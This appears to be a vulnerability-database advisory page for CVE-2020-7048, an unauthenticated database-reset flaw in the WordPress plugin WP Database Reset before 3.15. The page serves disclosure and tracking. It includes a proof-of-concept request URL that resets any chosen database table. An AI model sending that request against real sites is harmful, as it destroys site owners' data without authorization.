Lucene search
Chloe ChamberlandWPVDB-ID:8CB84B6C-F0CD-410D-8A85-90C031DEA2C8HistoryJan 16, 2020 - 12:00 a.m.
WP Database Reset < 3.15 - Unauthenticated Database Reset
2020-01-1600:00:00
Chloe Chamberland
wpscan.com
7
0.007 Low
EPSS
Percentile
80.8%
This flaw “allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.”
PoC
URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code;=11111&db-reset-code-confirm;=11111 Where you can set db-reset-tables%5B%5D to any database table you want to delete.
| CPE | Name | Operator | Version |
|---|---|---|---|
| wordpress-database-reset | lt | 3.15 |
Related
cve
cve
CVE-2020-7048
2020-01-16 21:15:12
nvd
nvd
CVE-2020-7048
2020-01-16 21:15:12
cvelist
cvelist
CVE-2020-7048
2020-01-16 20:35:15
prion
prion
Design/Logic Flaw
2020-01-16 21:15:00
githubexploit
githubexploit
patchstack
patchstack
wpexploit
wpexploit
WP Database Reset < 3.15 - Unauthenticated Database Reset
2020-01-16 00:00:00
checkpoint_advisories
checkpoint_advisories
openvas
openvas
WordPress Database Reset Plugin <= 3.1 Multiple Vulnerabilities
2020-01-24 00:00:00
qualysblog
qualysblog
WordPress Database Reset Plugin Vulnerability (CVE-2020-7047, CVE-2020-7048)
2020-01-24 16:00:16